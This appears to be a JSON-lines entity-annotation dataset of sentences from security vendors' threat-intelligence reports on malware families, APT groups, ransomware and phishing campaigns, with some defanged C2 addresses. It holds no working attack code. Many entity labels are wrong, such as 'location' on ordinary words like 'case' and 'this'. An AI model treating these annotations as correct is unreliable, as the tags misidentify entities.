new.","entities":[{"id":46244,"label":"SOFTWARE","start_offset":130,"end_offset":137}],"relations":[],"Comments":[]} {"id":7178,"text":"To help prevent any damage, we decided to publish our findings before the group deploys the attack.","entities":[],"relations":[],"Comments":[]} {"id":11219,"text":"Once the attacker has logged in to the victim\u2019s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[],"relations":[],"Comments":[]} {"id":4771,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} {"id":1518,"text":" If the file does receive data from the server in excess of 20 bytes it will be in the following format: <2 byte data length><0xABCDEF88> The decrypted data will contain the following fields: The attack type field is used to determine if a SYN DDoS or DNS DDoS is used in an attack.","entities":[],"relations":[],"Comments":[]} {"id":13060,"text":"Analysis of Kinsing Malware's Use of Rootkit","entities":[{"id":48892,"label":"malware","start_offset":12,"end_offset":29},{"id":40769,"label":"attack-pattern","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} {"id":1676,"text":"This password is set to \u201cPassword\u201d by default, but can be retrieved from NetWire binaries if the attacker used something more secure.","entities":[{"id":4975,"label":"malware","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} {"id":8931,"text":"In this case, we can see that it took an hour and a half for the attackers to modify the legitimate installer and add malicious code to it.","entities":[{"id":27616,"label":"location","start_offset":8,"end_offset":12},{"id":27617,"label":"location","start_offset":17,"end_offset":20},{"id":27618,"label":"TIME","start_offset":38,"end_offset":56},{"id":27619,"label":"location","start_offset":110,"end_offset":113}],"relations":[],"Comments":[]} {"id":7515,"text":"A simple RSA algorithm with very small keys encrypts the message seen above.","entities":[{"id":23365,"label":"identity","start_offset":9,"end_offset":12},{"id":23366,"label":"location","start_offset":33,"end_offset":38}],"relations":[],"Comments":[]} {"id":13058,"text":"Botnets Have Been Silently Mass-Scanning the Internet for Unsecured ENV Files Security firm Greynoise found that multiple threat actors, while drawing little attention to themselves, have spent the past two to three years mass-scanning the internet for ENV (environment) files that were accidentally uploaded and left exposed on web servers.","entities":[],"relations":[],"Comments":[]} {"id":4720,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50620,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} {"id":1895,"text":"The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below Another sample website involved the use of a closely copied version of an existing website, with slight changes in the logo and options above the page.","entities":[{"id":47027,"label":"SOFTWARE","start_offset":91,"end_offset":108},{"id":47028,"label":"DOMAIN","start_offset":168,"end_offset":180}],"relations":[],"Comments":[]} {"id":10846,"text":"MSG_CONNECTIVITY","entities":[],"relations":[],"Comments":[]} {"id":2258,"text":"While the malware lacked a large set of capabilities, it had a wealth of interesting and advanced features, such as the custom encryption\/encoding witnessed in the network traffic, the use of process hollowing against a randomly selected Microsoft Windows binary, and the downloading component that attempted to bypass network security measures by modifying the executable header.","entities":[{"id":47331,"label":"SOFTWARE","start_offset":238,"end_offset":255},{"id":47330,"label":"attack-pattern","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} {"id":13212,"text":"Threat actors like Tropic Trooper can also use an invisible web shell to hide its C&C server location and make incident response tricky.","entities":[{"id":41203,"label":"location","start_offset":34,"end_offset":37},{"id":41204,"label":"attack-pattern","start_offset":60,"end_offset":69},{"id":41205,"label":"location","start_offset":102,"end_offset":105}],"relations":[],"Comments":[]} {"id":4880,"text":"We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across the industry.","entities":[],"relations":[],"Comments":[]} {"id":1169,"text":" From edge case to systematic misclassifications, mutex usage is even more generally the canary in a coal mine than was previously realized. While tedious and time consuming, combing through mutex names did come with more than a few good laughs.","entities":[],"relations":[],"Comments":[]} {"id":2213,"text":" While the link above shows a file extension of an image, the transferred file is in fact a modified executable file. The downloaded file has the first two bytes of the PE file format replaced with the characters \u2018DW\u2019, instead of the usual \u2018MZ\u2019.","entities":[],"relations":[],"Comments":[]} {"id":14369,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":3587,"text":"After inspection we noticed that this version of CyaX was similarly notable due to two characteristics.","entities":[{"id":49371,"label":"tools","start_offset":49,"end_offset":53}],"relations":[],"Comments":[]} {"id":1237,"text":"A user can set a system-wide default SMS app as the only app with permission to send and receive SMS.","entities":[],"relations":[],"Comments":[]} {"id":10963,"text":"APP was designed specifically for high-risk accounts.","entities":[],"relations":[],"Comments":[]} {"id":5275,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":13317,"text":"Spear-phishing emails, for instance, rely on baiting targets with socially engineered documents.","entities":[{"id":41445,"label":"location","start_offset":0,"end_offset":5},{"id":41446,"label":"attack-pattern","start_offset":6,"end_offset":14}],"relations":[],"Comments":[]} {"id":1046,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) Today, Palo Alto Networks Unit 42 researchers are announcing details on a new high- severity vulnerability affecting the Google Android platform.","entities":[{"id":46537,"label":"identity","start_offset":60,"end_offset":98},{"id":46538,"label":"SOFTWARE","start_offset":174,"end_offset":197}],"relations":[],"Comments":[]} {"id":1234,"text":"However, two months ago, WildFire discovered a new Android malware, Cardbuyer, that circumvents this verification technique.","entities":[{"id":46615,"label":"SOFTWARE","start_offset":25,"end_offset":33},{"id":46616,"label":"SOFTWARE","start_offset":51,"end_offset":58},{"id":46617,"label":"malware","start_offset":68,"end_offset":77}],"relations":[],"Comments":[]} {"id":6169,"text":"After the attackers gain a foothold into the system \u2014 either through XSS injection or Service Worker \u2014 the next (and final part) of the attack chain, the exfiltration of the mailbox, is initiated.","entities":[{"id":19076,"label":"attack-pattern","start_offset":69,"end_offset":72},{"id":19077,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} {"id":2834,"text":"This is likely due to increased uptake of the patch MS17-010 in light of the WanaCrypt0r attacks, as well as efforts made within the security community.","entities":[{"id":48043,"label":"malware","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} {"id":8031,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} {"id":13077,"text":"Cybercriminals have recently been focusing their efforts on the retail industry, launching ransomware-based attacks that could prove disastrous for businesses if it disrupts their operations during important shopping seasons.","entities":[],"relations":[],"Comments":[]} {"id":13857,"text":"Outages have already started affecting motorists.","entities":[],"relations":[],"Comments":[]} {"id":13011,"text":"We encourage any potential targets to enable Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[],"relations":[],"Comments":[]} {"id":3129,"text":"An easy thing you can do is restart your router once a week (typically by unplugging it).","entities":[],"relations":[],"Comments":[]} {"id":8046,"text":"One of APT35\u2019s novel techniques involves using Telegram for operator notifications.","entities":[],"relations":[],"Comments":[]} {"id":10897,"text":"Possible connections to StrongPity","entities":[{"id":33177,"label":"threat-actor","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} {"id":4718,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50616,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":13118,"text":"That\u2019s why we\u2019re delighted to be a launch partner for new AWS Marketplace feature.","entities":[{"id":48902,"label":"SOFTWARE","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} {"id":7371,"text":"Another variant executes a set of commands once a system is successfully compromised.","entities":[],"relations":[],"Comments":[]} {"id":3120,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":3462,"text":"This can be an indication that these malware tools were developed by the same group.","entities":[],"relations":[],"Comments":[]} {"id":4508,"text":"Spoofers may send forged messages using an organization\u2019s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} {"id":1232,"text":"Previous attack cases, such as Zitmo and Cardbuyer, showed the risk of using SMS for payment authentication.","entities":[{"id":46613,"label":"malware","start_offset":31,"end_offset":36},{"id":46614,"label":"malware","start_offset":41,"end_offset":50}],"relations":[],"Comments":[]} {"id":4326,"text":"The file is then loaded in memory via PowerShell.","entities":[{"id":50128,"label":"tools","start_offset":38,"end_offset":48}],"relations":[],"Comments":[]} {"id":10001,"text":"Internal PlugX date dword value inside the printdat.dll file Mitigating supply chain attacks","entities":[{"id":30529,"label":"malware","start_offset":9,"end_offset":14},{"id":30530,"label":"location","start_offset":15,"end_offset":19},{"id":30531,"label":"location","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":1672,"text":"Upon receipt of a command from the server, a single function is called to decrypt the payload data and execute the received instruction.","entities":[],"relations":[],"Comments":[]} {"id":14364,"text":"Figure 21. Connection of Maikspy variants to 107[.]180[.]46[.]243 and hxxp:\/\/fakeomegle[.]com Figure 22. Connection of Maikspy variants to 198[.]12[.]149[.]13and hxxp:\/\/miakhalifagame[.]com\/","entities":[{"id":51779,"label":"URL","start_offset":163,"end_offset":191},{"id":51777,"label":"URL","start_offset":70,"end_offset":93},{"id":51781,"label":"malware","start_offset":120,"end_offset":127},{"id":51778,"label":"IPV4","start_offset":140,"end_offset":159},{"id":51780,"label":"malware","start_offset":25,"end_offset":32},{"id":44372,"label":"IPV4","start_offset":45,"end_offset":65}],"relations":[{"id":1161,"from_id":51780,"to_id":44372,"type":"communicates-with"},{"id":1162,"from_id":51780,"to_id":51777,"type":"communicates-with"},{"id":1163,"from_id":51781,"to_id":51778,"type":"communicates-with"},{"id":1164,"from_id":51781,"to_id":51779,"type":"communicates-with"}],"Comments":[]} {"id":14030,"text":"We assume there are multiple developers within APT37, and not all of them follow the same practices.","entities":[{"id":47196,"label":"threat-actor","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} {"id":14195,"text":"First comes continuous risk-based patching, multi-factor authentication, network monitoring, least privilege access, data encryption, phishing awareness training, and other cyber-hygiene steps.","entities":[],"relations":[],"Comments":[]} {"id":1006,"text":"Some accounts advertised candidacy towards registration for student discount at retailers such as Amazon, BestBuy, Apple, and Dell.","entities":[{"id":46508,"label":"identity","start_offset":126,"end_offset":130},{"id":46507,"label":"identity","start_offset":115,"end_offset":120},{"id":46505,"label":"identity","start_offset":98,"end_offset":104},{"id":46506,"label":"identity","start_offset":106,"end_offset":113}],"relations":[],"Comments":[]} {"id":4635,"text":"HYPERSCRAPE demonstrates Charming Kitten\u2019s commitment to developing and maintaining purpose-built capabilities.","entities":[{"id":50555,"label":"malware","start_offset":0,"end_offset":11},{"id":14080,"label":"threat-actor","start_offset":25,"end_offset":40}],"relations":[],"Comments":[]} {"id":12962,"text":"We haven\u2019t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} {"id":20,"text":"The other list is of last week\u2019s campaign by the same attackers (exhaustive or close to it). Palo Alto Networks Enterprise Security Platform would have stopped this ransomware attack campaign thanks to the platform\u2019s unique integration between the network, endpoint and the cloud to maximize security.","entities":[{"id":45809,"label":"identity","start_offset":94,"end_offset":112}],"relations":[],"Comments":[]} {"id":586,"text":" Highlights from the 2021 Unit 42 Ransomware Threat Report Ransomware Threat Assessments: A Companion to the 2021 Unit 42 Ransomware Threat Report Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":1956,"label":"identity","start_offset":26,"end_offset":33},{"id":1958,"label":"identity","start_offset":115,"end_offset":122}],"relations":[],"Comments":[]} {"id":90,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":4276,"text":"Lately, they have been sending multiple RTF files exploiting CVE-2017-8570.","entities":[{"id":50077,"label":"vulnerability","start_offset":61,"end_offset":74}],"relations":[],"Comments":[]} {"id":8552,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":26417,"label":"location","start_offset":10,"end_offset":14},{"id":26418,"label":"location","start_offset":89,"end_offset":95},{"id":26419,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":2640,"text":" Palo Alto Networks customers receive protections against LockBit 2.0 attacks from Cortex XDR, as well as from the WildFire cloud-delivered security subscription for the Next-Generation Firewall.","entities":[{"id":47824,"label":"malware","start_offset":58,"end_offset":69},{"id":45640,"label":"identity","start_offset":1,"end_offset":19},{"id":45642,"label":"SOFTWARE","start_offset":83,"end_offset":93},{"id":45643,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} {"id":5670,"text":"This past year, TAG has been collaborating with Google\u2019s CyberCrime Investigation Group to disrupt Glupteba activity involving Google services.","entities":[{"id":17466,"label":"malware","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} {"id":4633,"text":"We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.","entities":[],"relations":[],"Comments":[]} {"id":843,"text":" Privilege escalation attacks against the kernel have been around for some time and are well-known and can be well protected against. Kernel APC attacks however are a different class of attack.","entities":[{"id":2760,"label":"attack-pattern","start_offset":1,"end_offset":21},{"id":44889,"label":"attack-pattern","start_offset":135,"end_offset":153}],"relations":[],"Comments":[]} {"id":8858,"text":"This variant of PlugX (detected by Trend Micro as Backdoor.Win32.PLUGX.DYSGUT), including the code in the BLOB, launches an svchost.exe process and injects to it.","entities":[{"id":27413,"label":"malware","start_offset":16,"end_offset":21},{"id":27415,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} {"id":1521,"text":" If the first value in the packet is 0xCC then the file will set \"g_mainsrvinfo.srandipb\" and \"g_mainsrvinfo.srandipe\". If the first value in the packet is 0x33 the file will use tcp to download a file and execute it.","entities":[],"relations":[],"Comments":[]} {"id":2286,"text":"Google is alleging violations under the Racketeer Influenced and Corrupt Organizations Act (RICO), the Computer Fraud and Abuse Act, the Electronic Communications Privacy Act, the Lanham Act, and tortious interference of business relationships, and unjust enrichment.","entities":[{"id":45444,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":8084,"text":"Since first discovering this activity, OpenSUpdater's authors have tried other variations on invalid encodings to further evade detection.","entities":[{"id":25069,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} {"id":7455,"text":"Overview of Pawn Storm\u2019s Yahoo credential phishing campaigns.","entities":[{"id":23176,"label":"attack-pattern","start_offset":42,"end_offset":50}],"relations":[],"Comments":[]} {"id":5765,"text":"How MITRE ATT&CK Assists in Threat Investigation","entities":[],"relations":[],"Comments":[]} {"id":7278,"text":"According to UTF-8 mapping, the related Unicode code is \"U+FE00\".","entities":[],"relations":[],"Comments":[]} {"id":1624,"text":" Funtasy intercepts this message, parses out the PIN and sends it back to the registration server, completing the enrollment process.","entities":[],"relations":[],"Comments":[]} {"id":4526,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations \u2013 in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} {"id":6707,"text":"Our products are designed with robust built-in security features, like Gmail protections against phishing and Safe Browsing in Chrome, but we still dedicate significant resources to developing new tools and technology to help identify, track and stop this kind of activity.","entities":[{"id":20855,"label":"location","start_offset":13,"end_offset":16},{"id":20856,"label":"location","start_offset":47,"end_offset":55},{"id":20858,"label":"attack-pattern","start_offset":97,"end_offset":105},{"id":20859,"label":"location","start_offset":106,"end_offset":109},{"id":20860,"label":"threat-actor","start_offset":110,"end_offset":114},{"id":20861,"label":"location","start_offset":203,"end_offset":206},{"id":20862,"label":"location","start_offset":242,"end_offset":245},{"id":20863,"label":"malware","start_offset":246,"end_offset":250}],"relations":[],"Comments":[]} {"id":1051,"text":" What our researchers have found is a vulnerability that can be used to more easily enable an \u201coverlay attack,\u201d a type of attack that is already known on the Android platform.","entities":[{"id":46543,"label":"SOFTWARE","start_offset":158,"end_offset":165}],"relations":[],"Comments":[]} {"id":2906,"text":" The exploit uses the code above to restore the corrupted object and save the stack frame on the heap so that the process would not crash after the exploit is successful.","entities":[],"relations":[],"Comments":[]} {"id":5231,"text":"We construe AnubisSpy to be linked to the cyberespionage campaign Sphinx (APT-C-15) based on shared file structures and command-and-control (C&C) server as well as targets.","entities":[{"id":51265,"label":"campaign","start_offset":65,"end_offset":83},{"id":51264,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} {"id":3119,"text":" If you have any questions, please visit the Threat & Vulnerability Discussions on our Live Community.","entities":[],"relations":[],"Comments":[]} {"id":5980,"text":"Within these files is a link to an attacker controlled phishing domain.","entities":[{"id":18401,"label":"attack-pattern","start_offset":55,"end_offset":63}],"relations":[],"Comments":[]} {"id":4008,"text":"They also showed real-world implications that these vulnerabilities have.","entities":[],"relations":[],"Comments":[]} {"id":574,"text":"One of the reasons Ryuk causes so much damage is because it will scan the local network and try to infect other machines through Server Message Block (SMB) protocols.","entities":[{"id":1919,"label":"malware","start_offset":19,"end_offset":23},{"id":46177,"label":"SOFTWARE","start_offset":129,"end_offset":155}],"relations":[],"Comments":[]} {"id":4414,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":13506,"text":"While the threat actor has been known to offer its services to a more general audience \u2014 as seen in its online advertisements in the underground \u2014 research from groups such as eQualit.ie and Amnesty International show that Void Balaur is likely also involved in attacks against higher profile victims, ranging from human rights activists and journalists to politicians and even presidential candidates.","entities":[{"id":51574,"label":"identity","start_offset":176,"end_offset":186},{"id":51575,"label":"identity","start_offset":191,"end_offset":213},{"id":51576,"label":"threat-actor","start_offset":223,"end_offset":234}],"relations":[],"Comments":[]} {"id":4735,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50647,"label":"location","start_offset":89,"end_offset":109},{"id":50643,"label":"TIME","start_offset":3,"end_offset":7},{"id":50644,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50645,"label":"location","start_offset":66,"end_offset":71},{"id":50646,"label":"location","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":12503,"text":"For a period of time, we observed thousands of instances of malicious Glupteba downloads per day.","entities":[{"id":38911,"label":"location","start_offset":16,"end_offset":20},{"id":38913,"label":"malware","start_offset":70,"end_offset":78},{"id":38914,"label":"location","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} {"id":2117,"text":"Palo Alto Networks customers who have deployed the latest vulnerability signatures released on August 24, 2018, are protected.","entities":[{"id":47255,"label":"identity","start_offset":0,"end_offset":18},{"id":47256,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} {"id":12364,"text":"As the course of the COVID-19 pandemic evolves, we\u2019ve seen threat actors evolve their tactics as well.","entities":[],"relations":[],"Comments":[]} {"id":13539,"text":"The campaign initially compromised e-commerce online shops in Japan, Australia, and European countries via spam emails with malicious attachments.","entities":[{"id":51605,"label":"attack-pattern","start_offset":107,"end_offset":118},{"id":51606,"label":"campaign","start_offset":4,"end_offset":12},{"id":51607,"label":"identity","start_offset":35,"end_offset":58},{"id":51601,"label":"location","start_offset":62,"end_offset":67},{"id":51602,"label":"location","start_offset":69,"end_offset":78},{"id":51603,"label":"location","start_offset":84,"end_offset":92}],"relations":[{"id":1105,"from_id":51606,"to_id":51607,"type":"targets"},{"id":1106,"from_id":51607,"to_id":51601,"type":"located-at"},{"id":1107,"from_id":51607,"to_id":51602,"type":"located-at"},{"id":1108,"from_id":51607,"to_id":51603,"type":"located-at"},{"id":1110,"from_id":51606,"to_id":51605,"type":"uses"}],"Comments":[]} {"id":4694,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} {"id":10597,"text":"Exploiting CVE-2019-0676 enabled attackers to reveal presence or non-presence of files on the victim\u2019s computer; this information was later used to decide whether or not a second stage exploit should be delivered.","entities":[],"relations":[],"Comments":[]} {"id":308,"text":"This reconnaissance was then leveraged in brute force attacks against credentials, toward unauthorized access, implant installation, and subsequent exfiltration of consumer payment data.","entities":[{"id":1059,"label":"attack-pattern","start_offset":42,"end_offset":53},{"id":46007,"label":"attack-pattern","start_offset":111,"end_offset":131},{"id":46009,"label":"attack-pattern","start_offset":148,"end_offset":185},{"id":46008,"label":"attack-pattern","start_offset":90,"end_offset":109}],"relations":[],"Comments":[]} {"id":13945,"text":"Maze was one of the first documented cases of this.","entities":[{"id":48760,"label":"malware","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":3988,"text":"It also establishes a few recommendations for software customers and vendors to prevent and mitigate attacks as well as improve resilience against software supply chain attacks.","entities":[],"relations":[],"Comments":[]} {"id":4888,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[{"id":50906,"label":"identity","start_offset":75,"end_offset":78}],"relations":[],"Comments":[]} {"id":860,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":323,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2039,"text":"What is peculiar about this file is it is a variant of the open-source MicroBackdoor, a backdoor allowing an attacker to browse the file system, upload and download files, execute commands and remove itself from the system (Figure 13).","entities":[{"id":47132,"label":"malware","start_offset":71,"end_offset":84}],"relations":[],"Comments":[]} {"id":2943,"text":"The tactics and techniques are not new or sophisticated.","entities":[],"relations":[],"Comments":[]} {"id":14009,"text":"Malware author\u2019s developer environment","entities":[],"relations":[],"Comments":[]} {"id":3477,"text":"Contents of malicious SFX file used by Blackgear, posing as a Flash Player installer Figure 4. Malicious document used by Blackgear (top) and how VBScript is used to execute Marade (bottom)","entities":[{"id":49277,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":49278,"label":"SOFTWARE","start_offset":62,"end_offset":74},{"id":49279,"label":"threat-actor","start_offset":123,"end_offset":132},{"id":49280,"label":"malware","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} {"id":5439,"text":"Sandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best.","entities":[{"id":51440,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":10567,"text":"In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018.","entities":[],"relations":[],"Comments":[]} {"id":5414,"text":"The samples that we have analyzed are compiled for ARM and are dynamically linked against uClibc.","entities":[],"relations":[],"Comments":[]} {"id":2342,"text":"They are the equivalent of LoadLibrary and GetProcAddress in Windows.","entities":[{"id":47399,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} {"id":2638,"text":" Additionally, LockBit 2.0 has affected many companies globally, with top victims based in the U.S., Italy and Germany.","entities":[{"id":47820,"label":"malware","start_offset":15,"end_offset":26},{"id":47821,"label":"location","start_offset":95,"end_offset":99},{"id":47822,"label":"location","start_offset":101,"end_offset":106},{"id":47823,"label":"location","start_offset":111,"end_offset":118}],"relations":[],"Comments":[]} {"id":13316,"text":"Nurture a culture of cybersecurity.","entities":[],"relations":[],"Comments":[]} {"id":9606,"text":"public void ManageTakeOut() { string text = \"PipeName\";","entities":[{"id":29425,"label":"location","start_offset":0,"end_offset":6},{"id":29426,"label":"malware","start_offset":7,"end_offset":11}],"relations":[],"Comments":[]} {"id":12588,"text":"For example, the payload we obtained contained a kernel module for capturing keystrokes.","entities":[],"relations":[],"Comments":[]} {"id":7,"text":"The attacker used a polymorphic malware builder to generate malware with a unique hash for each victim, preventing signature-based solutions from detecting the new attacks before it was too late for the victim.","entities":[],"relations":[],"Comments":[]} {"id":5268,"text":"Enforcing the principle of least privilege and implementing an app reputation system are just some of the best practices that can help mitigate threats.","entities":[],"relations":[],"Comments":[]} {"id":13901,"text":"This is the riskiest step so far in the ransomware execution process, as data exfiltration is more likely to be noticed by the victim organization\u2019s security team.","entities":[],"relations":[],"Comments":[]} {"id":2902,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 16)]","entities":[],"relations":[],"Comments":[]} {"id":3490,"text":"bin","entities":[],"relations":[],"Comments":[]} {"id":9406,"text":"Collection Capture Audio T1429 Used to record audio information Collection Capture SMS Messages T1412 Used to collect SMS messages","entities":[{"id":28955,"label":"attack-pattern","start_offset":75,"end_offset":95}],"relations":[],"Comments":[]} {"id":5423,"text":"But what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.","entities":[{"id":51430,"label":"malware","start_offset":28,"end_offset":41}],"relations":[],"Comments":[]} {"id":7051,"text":"Structure of decrypted data.res file Lastly, the launcher starts a suspended process with the command line \u201cC:\\Windows\\system32\\svchost.exe -k LocalServices,\u201dand injects the appropriate shellcode into it (either 32- or 64-bit).","entities":[{"id":22104,"label":"location","start_offset":0,"end_offset":9},{"id":22105,"label":"identity","start_offset":223,"end_offset":226}],"relations":[],"Comments":[]} {"id":10417,"text":"Users should also take full advantage of their network defense solutions by enhancing settings, especially for macro malware attached emails.","entities":[],"relations":[],"Comments":[]} {"id":14380,"text":"A lot of the advanced security we\u2019ve been delivering on the last few years has been focused on this problem.","entities":[],"relations":[],"Comments":[]} {"id":5409,"text":" The NCSC report covered malware targeting a specific vendor, namely WatchGuard.","entities":[{"id":51402,"label":"identity","start_offset":6,"end_offset":10},{"id":51403,"label":"identity","start_offset":70,"end_offset":80}],"relations":[],"Comments":[]} {"id":14384,"text":"But most of EDR\u2019s capabilities are for endpoints they are on: ones they manage.","entities":[],"relations":[],"Comments":[]} {"id":9425,"text":"It seems that this hard-coded key and flawed RC4 implementation were also used in a malware family named TigerPlug, probably because it spreads the PlugX malware.","entities":[{"id":29007,"label":"location","start_offset":19,"end_offset":23},{"id":29008,"label":"location","start_offset":34,"end_offset":37},{"id":29010,"label":"malware","start_offset":148,"end_offset":153}],"relations":[],"Comments":[]} {"id":7151,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":1653,"text":"On July 22, Palo Alto Networks threat intelligence team, Unit 42, released our first report on the evolution of \u201cSilver Spaniel\u201d 419 scammers.","entities":[{"id":45085,"label":"identity","start_offset":12,"end_offset":55},{"id":45086,"label":"identity","start_offset":57,"end_offset":64},{"id":45089,"label":"TIME","start_offset":3,"end_offset":10},{"id":45087,"label":"malware","start_offset":113,"end_offset":127}],"relations":[],"Comments":[]} {"id":9133,"text":"Lurk\u2019s infrastructure also exhibited new capabilities.","entities":[],"relations":[],"Comments":[]} {"id":4212,"text":"The displayed Urdu text could be translated as \u201cReal women, girls, and housewives || Download the app now More than thousands of women app.\u201d","entities":[],"relations":[],"Comments":[]} {"id":3600,"text":"The Premium Plan requires payment and works automatically, while the Private Stub requires the user to contact the support from the service for further personalization.","entities":[],"relations":[],"Comments":[]} {"id":13173,"text":"Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":2711,"text":" It is always important to view this type of critical vulnerability in the larger context of the threat landscape.","entities":[],"relations":[],"Comments":[]} {"id":798,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3539,"text":"Organizations can also consider managed detection and response, which provides in-depth threat analysis and correlation \u2014 from networks to servers and endpoints \u2014 to obtain a complete picture of and further understand a targeted attack.","entities":[],"relations":[],"Comments":[]} {"id":2646,"text":" Like other ransomware families such as BlackByte, LockBit 2.0 avoids systems that use Eastern European languages, including many written with Cyrillic alphabets.","entities":[{"id":45646,"label":"malware","start_offset":51,"end_offset":62},{"id":45645,"label":"malware","start_offset":40,"end_offset":49}],"relations":[],"Comments":[]} {"id":6197,"text":"The first involves injecting malicious code into the webpage via an XSS vulnerability on the webmail system.","entities":[{"id":19149,"label":"attack-pattern","start_offset":68,"end_offset":71}],"relations":[],"Comments":[]} {"id":1663,"text":" The shortest possible packet is the \u201cHeartBeat\u201d command, which NetWire generates every 10 seconds.","entities":[{"id":46872,"label":"malware","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} {"id":2524,"text":" These approaches are not particularly clever or sophisticated, but often they are effective.","entities":[],"relations":[],"Comments":[]} {"id":4606,"text":"The solution allows you to see more and respond faster by collecting and correlating data across email, endpoints, servers, cloud workloads, and networks.","entities":[],"relations":[],"Comments":[]} {"id":1238,"text":"However, other installed apps are still allowed to receive SMS and upload the content via Internet.","entities":[],"relations":[],"Comments":[]} {"id":12311,"text":"We terminated 9 YouTube channels as part of our investigation into a coordinated influence operation linked to Egypt.","entities":[],"relations":[],"Comments":[]} {"id":13565,"text":"The source code of this framework is shared across many Chinese public forums.","entities":[{"id":51646,"label":"location","start_offset":56,"end_offset":63},{"id":51647,"label":"tools","start_offset":24,"end_offset":33}],"relations":[{"id":1123,"from_id":51647,"to_id":51646,"type":"related-to"}],"Comments":[]} {"id":2384,"text":"ScrambleCross receives instructions from its command-and-control (C&C) server that allow it to receive and manipulate plug-ins.","entities":[{"id":47449,"label":"malware","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":12505,"text":"While analyzing Glupteba binaries, our team identified a few containing a git repository URL: \u201cgit.voltronwork.com\u201d.","entities":[{"id":38916,"label":"malware","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":805,"text":"The impact of a successful credential theft is, ultimately, access and authorization.","entities":[{"id":46359,"label":"attack-pattern","start_offset":27,"end_offset":43}],"relations":[],"Comments":[]} {"id":1677,"text":"The usage for the tool is show below.","entities":[],"relations":[],"Comments":[]} {"id":13781,"text":"Meanwhile, the second payload is a typical Waterbear first-stage 